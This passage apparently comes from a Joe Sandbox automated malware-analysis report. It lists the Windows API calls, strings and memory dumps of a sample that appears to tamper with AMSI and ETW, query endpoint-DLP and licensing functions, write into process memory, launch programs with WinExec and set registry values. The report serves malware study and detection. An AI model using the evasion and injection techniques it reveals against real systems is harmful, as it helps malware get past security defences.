                                                                                                                          • Part of subcall function 029D87A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000860,00000000,02A213A4,029DA3C7,ScanString,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,Initialize), ref: 029D880A
                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02A2137C,029EAFD8,UacInitialize,02A2137C,029EAFD8,ScanBuffer,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,UacScan,02A2137C), ref: 029E89F4
                                                                                                                          • Part of subcall function 029C7E18: GetFileAttributesA.KERNEL32(00000000,?,029DF8CC,ScanString,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,ScanString,02A2137C,029EAFD8,UacScan,02A2137C,029EAFD8,UacInitialize), ref: 029C7E23
                                                                                                                          • Part of subcall function 029DDACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,029DDB9E), ref: 029DDB0B
                                                                                                                          • Part of subcall function 029DDACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 029DDB45
                                                                                                                          • Part of subcall function 029DDACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 029DDB72
                                                                                                                          • Part of subcall function 029DDACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 029DDB7B
                                                                                                                          • Part of subcall function 029D818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,029D8216), ref: 029D81F8
                                                                                                                        • ExitProcess.KERNEL32(00000000,OpenSession,02A2137C,029EAFD8,ScanBuffer,02A2137C,029EAFD8,Initialize,02A2137C,029EAFD8,00000000,00000000,00000000,ScanString,02A2137C,029EAFD8), ref: 029EAA25
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$CloseFile$CreateFreeHandleLoadProcess$AddressAttributesCacheExitFlushInstructionProcResumeThreadUserWrite
                                                                                                                        • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000000,?,029C2000), ref: 029C17D0
                                                                                                                        • Sleep.KERNEL32(0000000A,00000000,?,029C2000), ref: 029C17E6
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID:

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(amsi), ref: 029D8715
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                          • Part of subcall function 029D7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029D7D74
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 029D8774
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                        • String ID: DllGetClassObject$W$amsi

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000000,?), ref: 029C1B17
                                                                                                                        • Sleep.KERNEL32(0000000A,00000000,?), ref: 029C1B31
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3472027048-0

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 029DE436
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CheckConnectionInternet
                                                                                                                        • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                        • API String ID: 3847983778-3852638603
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        • WinExec.KERNEL32(?,?), ref: 029D8478
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$Exec
                                                                                                                        • String ID: Kernel32$WinExec
                                                                                                                        • API String ID: 2292790416-3609268280
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        • WinExec.KERNEL32(?,?), ref: 029D8478
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$Exec
                                                                                                                        • String ID: Kernel32$WinExec
                                                                                                                        • API String ID: 2292790416-3609268280
                                                                                                                        APIs
                                                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,029D5CFC,?,?,029D3888,00000001), ref: 029D5C10
                                                                                                                        • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,029D5CFC,?,?,029D3888,00000001), ref: 029D5C3E
                                                                                                                          • Part of subcall function 029C7D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,029D3888,029D5C7E,00000000,029D5CFC,?,?,029D3888), ref: 029C7D66
                                                                                                                          • Part of subcall function 029C7F20: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,029D3888,029D5C99,00000000,029D5CFC,?,?,029D3888,00000001), ref: 029C7F3F
                                                                                                                        • GetLastError.KERNEL32(00000000,029D5CFC,?,?,029D3888,00000001), ref: 029D5CA3
                                                                                                                          • Part of subcall function 029CA700: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,029CC361,00000000,029CC3BB), ref: 029CA71F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 503785936-0
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,02B15914), ref: 029DE704
                                                                                                                        • RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,029DE76F), ref: 029DE73C
                                                                                                                        • RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,029DE76F), ref: 029DE747
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 779948276-0
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,02B15914), ref: 029DE704
                                                                                                                        • RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,029DE76F), ref: 029DE73C
                                                                                                                        • RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,029DE76F), ref: 029DE747
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 779948276-0
                                                                                                                        • Opcode ID: 1c166cb1b926bdb8e6a6d212426aaf7c9c832e140515a040e57312b731035103
                                                                                                                        • Instruction ID: e00dcf7cb4661d1134512e8ba4f6f5aac58a5f2304e7c768ec746809103ca5ce
                                                                                                                        • Opcode Fuzzy Hash: 1c166cb1b926bdb8e6a6d212426aaf7c9c832e140515a040e57312b731035103
                                                                                                                        • Instruction Fuzzy Hash: F9114F71750214AFEB14EFA8C89195E7BEDEB88760FA05468B604DB254D730DA00DF62
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClearVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1473721057-0
                                                                                                                        • Opcode ID: 302ade95d1b9a7ba2de9142f3412600a97bc6d975b7accb27b37e500ab4a575b
                                                                                                                        • Instruction ID: 951342a2624dafbf97ecb8509192666265faf94e6d8d84769df7e27860189299
                                                                                                                        • Opcode Fuzzy Hash: 302ade95d1b9a7ba2de9142f3412600a97bc6d975b7accb27b37e500ab4a575b
                                                                                                                        • Instruction Fuzzy Hash: E9F0622470421486D7257B38C9C866D6A9EBFC5710B70583EA4CB9B28ACB34EC46CB63
                                                                                                                        APIs
                                                                                                                        • SysFreeString.OLEAUT32(029DE950), ref: 029C4C1A
                                                                                                                        • SysAllocStringLen.OLEAUT32(?,?), ref: 029C4D07
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 029C4D19
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Free$Alloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 986138563-0
                                                                                                                        • Opcode ID: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                                                                        • Instruction ID: 2ad7de5a631f4bd0fc11fb5ed58ca84d46a0ee583fbe0a968d86b0d881d0ff0b
                                                                                                                        • Opcode Fuzzy Hash: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                                                                        • Instruction Fuzzy Hash: 7DE017FC2052016EFB182F21DC50B3B772EAFC1741B74989DA804CA169DB38D841AE3A
                                                                                                                        APIs
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 029D7362
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeString
                                                                                                                        • String ID: H
                                                                                                                        • API String ID: 3341692771-2852464175
                                                                                                                        • Opcode ID: 5fd2bfe7138d82b1d633c9a30c2d0cc91df03f5916d5dbda417ae3618b8e72f4
                                                                                                                        • Instruction ID: 7b1850f3ae1e01b046be3927dce8ffdb4b763f5b409c6a910f171311063a395b
                                                                                                                        • Opcode Fuzzy Hash: 5fd2bfe7138d82b1d633c9a30c2d0cc91df03f5916d5dbda417ae3618b8e72f4
                                                                                                                        • Instruction Fuzzy Hash: 54B1EF74A016089FDB14CFA9E880AADFBF6FF89314F248569E905AB360D731A845DF50
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(00000000,00000000,029D890B), ref: 029D8858
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                          • Part of subcall function 029D7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029D7D74
                                                                                                                        • FreeLibrary.KERNEL32(74B10000,00000000,02A21388,Function_000065D8,00000004,02A21398,02A21388,05F5E0FF,00000040,02A2139C,74B10000,00000000,00000000,00000000,00000000,029D890B), ref: 029D88EB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressLibraryProc$FreeLoadMemoryVirtualWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3283153180-0
                                                                                                                        • Opcode ID: d4ca3f887d8fc59d5491ef7d3a2c4fd6934bc728dbf89816b4b46bca9b468efe
                                                                                                                        • Instruction ID: 0d1fe3d3a2362f5c7c69a9ea0d6ca8f1c22128b883a1f0f74becf1fe7d79ef68
                                                                                                                        • Opcode Fuzzy Hash: d4ca3f887d8fc59d5491ef7d3a2c4fd6934bc728dbf89816b4b46bca9b468efe
                                                                                                                        • Instruction Fuzzy Hash: F0119A74B40314ABFB50FBE8CE11A5E77AAEBC5710F6244A87108E7642DE3499019F55
                                                                                                                        APIs
                                                                                                                        • VariantCopy.OLEAUT32(00000000,00000000), ref: 029CE709
                                                                                                                          • Part of subcall function 029CE2EC: VariantClear.OLEAUT32(?), ref: 029CE2FB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearCopy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 274517740-0
                                                                                                                        • Opcode ID: f5b4b80eac852f800e1c5e6d9d677302ef082feeffd925b338c4710ae2c093c5
                                                                                                                        • Instruction ID: 8f3a2f868f565467b878d9ae0b3a9593793a2c2acd7ec22007c3339e87004c6a
                                                                                                                        • Opcode Fuzzy Hash: f5b4b80eac852f800e1c5e6d9d677302ef082feeffd925b338c4710ae2c093c5
                                                                                                                        • Instruction Fuzzy Hash: D6117020700254978B30AB28C9C4666679AEFC5750734983EA9CB9B25ADB30CC41CA63
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1927566239-0
                                                                                                                        • Opcode ID: 684a30644f340b77280ccdd81a43919218e410bb1e10336edb0dec065349b242
                                                                                                                        • Instruction ID: 3c83bad917d7469f9a09c172991615aac9778abf55f925a99cc1fa80250b5cae
                                                                                                                        • Opcode Fuzzy Hash: 684a30644f340b77280ccdd81a43919218e410bb1e10336edb0dec065349b242
                                                                                                                        • Instruction Fuzzy Hash: 40315071A00248AFDB10DFA8C985ABE77ECEB4C304F644569F98AD3241D734E951CB63
                                                                                                                        APIs
                                                                                                                        • CLSIDFromProgID.OLE32(00000000,?,00000000,029D6D41,?,?,?,00000000), ref: 029D6D21
                                                                                                                          • Part of subcall function 029C4C0C: SysFreeString.OLEAUT32(029DE950), ref: 029C4C1A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeFromProgString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4225568880-0
                                                                                                                        • Opcode ID: 696a0d9e4344b970e80d0e546907a1b83b733301ad7319d03e5a2dc8c013e55c
                                                                                                                        • Instruction ID: 9a5b863f8e1eeed594c7d31afaef69e63305e46ef3bd4f05ae83db02d06fbee8
                                                                                                                        • Opcode Fuzzy Hash: 696a0d9e4344b970e80d0e546907a1b83b733301ad7319d03e5a2dc8c013e55c
                                                                                                                        • Instruction Fuzzy Hash: 90E06571704204BBE701FBA1EC5195A77EDEFC9B10B614475E401D3550D974BD00A961
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(029C0000,?,00000105), ref: 029C5832
                                                                                                                          • Part of subcall function 029C5A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029C0000,029ED790), ref: 029C5A94
                                                                                                                          • Part of subcall function 029C5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029C0000,029ED790), ref: 029C5AB2
                                                                                                                          • Part of subcall function 029C5A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029C0000,029ED790), ref: 029C5AD0
                                                                                                                          • Part of subcall function 029C5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 029C5AEE
                                                                                                                          • Part of subcall function 029C5A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,029C5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 029C5B37
                                                                                                                          • Part of subcall function 029C5A78: RegQueryValueExA.ADVAPI32(?,029C5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,029C5B7D,?,80000001), ref: 029C5B55
                                                                                                                          • Part of subcall function 029C5A78: RegCloseKey.ADVAPI32(?,029C5B84,00000000,?,?,00000000,029C5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 029C5B77
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
